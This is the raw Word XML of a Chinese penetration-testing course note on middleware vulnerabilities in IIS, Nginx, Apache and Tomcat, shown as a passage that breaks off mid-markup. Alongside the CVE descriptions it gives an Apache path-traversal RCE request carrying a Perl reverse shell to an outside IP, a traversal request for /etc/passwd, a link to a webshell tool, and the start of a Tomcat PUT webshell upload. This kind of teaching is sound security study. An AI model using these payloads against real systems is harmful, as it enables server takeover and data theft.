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media/image1.png" ContentType="image/png"/>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media/image2.png" ContentType="image/png"/>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ps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:xml="http://www.w3.org/XML/1998/namespace" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="fc0403" w:val="triple"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>服务攻防-中间件安全&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CVE复现&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:ascii="微软雅黑"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>IIS&amp;Apache&amp;Tomcat&amp;Nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="13359205" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr descr="descript" name="picture" id="2"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="descript" name="picture" id="3"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="true">
                    <a:blip r:embed="rId5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="13359205" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="3823009" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr descr="descript" name="picture" id="5"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="descript" name="picture" id="6"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="true">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="3823009" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="5760085" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr name="文本框 maddsg" id="8"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                <wps:wsp>
                  <wps:cNvSpPr txBox="true"/>
                  <wps:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="5760085" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FAFAFA"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000">
                          <a:alpha val="10000"/>
                        </a:srgbClr>
                      </a:solidFill>
                    </a:ln>
                  </wps:spPr>
                  <wps:txbx>
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#知识点：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>中间件及框架列表：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins ，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>1、</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>中间件-IIS-短文件&amp;解析&amp;蓝屏等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、中间件-Nginx-文件解析&amp;命令执行等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>3、中间件-Apache-RCE&amp;目录遍历&amp;文件解析等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>4、中间件-Tomcat-弱口令&amp;文件上传&amp;文件包含等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#章节内容：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>常见</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr/>
                          <w:t>中间件</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>的安全测试：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>1、配置不当-</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr/>
                          <w:t>解析&amp;弱口令</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、安全机制-特定安全漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>3、安全机制-弱口令爆破攻击</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>4、安全应用-框架特定安全漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#前置知识：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>中间件安全测试流程：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>1、判断中间件信息-名称&amp;版本&amp;三方</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>2、判断中间件问题-配置不当&amp;公开漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>3、判断中间件利用-弱口令&amp;EXP&amp;框架漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>应用服务安全测试流程：见图</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>1、判断服务开放情况-端口扫描&amp;组合应用等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、判断服务类型归属-数据库&amp;文件传输&amp;通讯等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="6eg18n"/>
                          <w:rPr>
                            <w:rStyle w:val=""/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>3、判断服务利用方式-特定漏洞&amp;未授权&amp;弱口令等</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </wps:txbx>
                  <wps:bodyPr anchorCtr="false" forceAA="false" rtlCol="false" anchor="t" vertOverflow="overflow" wrap="square" spcFirstLastPara="false" compatLnSpc="true" horzOverflow="overflow" rIns="114300" lIns="400050" spcCol="0" numCol="1" rot="0" tIns="114300" fromWordArt="false" vert="horz" bIns="114300">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:spAutoFit/>
                  </wps:bodyPr>
                </wps:wsp>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030103" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030402" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>演示案例：</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中间件-IIS-短文件&amp;解析&amp;蓝屏等</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中间件-Nginx-文件解析&amp;命令执行等</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中间件-Apache-RCE&amp;目录遍历&amp;文件解析等</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中间件-Tomcat-弱口令&amp;文件上传&amp;文件包含等</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中间件-Apache_RCE&amp;Fofa_Viewer-走向高端啊</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distR="0" distB="0" distT="0">
            <wp:extent cy="5760085" cx="5760085"/>
            <wp:effectExtent b="0" r="0" t="0" l="0"/>
            <wp:docPr name="文本框 jam5i8" id="10"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                <wps:wsp>
                  <wps:cNvSpPr txBox="true"/>
                  <wps:spPr>
                    <a:xfrm>
                      <a:off y="0" x="0"/>
                      <a:ext cy="5760085" cx="5760085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FAFAFA"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000">
                          <a:alpha val="10000"/>
                        </a:srgbClr>
                      </a:solidFill>
                    </a:ln>
                  </wps:spPr>
                  <wps:txbx>
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#中间件-IIS-短文件&amp;解析&amp;蓝屏等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>1、短文件：信息收集</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>2、文件解析：还有点用</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>3、HTTP.SYS：蓝屏崩溃</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>4、</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>CVE-2017-7269 条件过老</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#中间件-Nginx-文件解析&amp;命令执行等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>1、后缀解析 文件名解析</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>配置不当：该漏洞与Nginx、php版本无关，属于用户配置不当造成的解析漏洞。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>CVE-2013-4547：影响版本：Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、cve_2021_23017 无EXP</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>3、</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>cve_2017_7529 意义不大</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#中间件-Apache-RCE&amp;目录遍历&amp;文件解析等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点，发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本，则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50，而不影响更早版本。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>1、cve_2021_42013  RCE</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t xml:space="preserve">POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、cve_2021_41773 目录穿越</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Burp：/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>3、cve-2017-15715  文件解析</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Apache HTTPD是一款HTTP服务器。其2.4.0~2.4.29版本存在一个解析漏洞，在解析PHP时，1.php\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>4、</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>cve_2017_9798 价值不高</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>5、cve_2018_11759 价值不高</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>6、cve_2021_37580 插件问题</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>#中间件-Tomcat-弱口令&amp;文件上传&amp;文件包含等</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="cx019l"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>1、弱口令猜解</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>https://github.com/BeichenDream/Godzilla</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>配置不当导致后台弱口令，可通过上传jsp压缩包改名的war拿shell</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>2、CVE-2017-12615 文件上传</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>当存在漏洞的Tomcat运行在Windows/Linux主机上， 且启用了HTTP PUT请求方法（ 例如， 将readonly初始化参数由默认值设置为false） ， 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件，JSP文件中的恶意代码将能被服务器执行， 导致服务器上的数据泄露或获取服务器权限。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>影响版本:Apache Tomcat 7.0.0 - 7.0.79</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>PUT /1.jsp/ HTTP/1.1</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
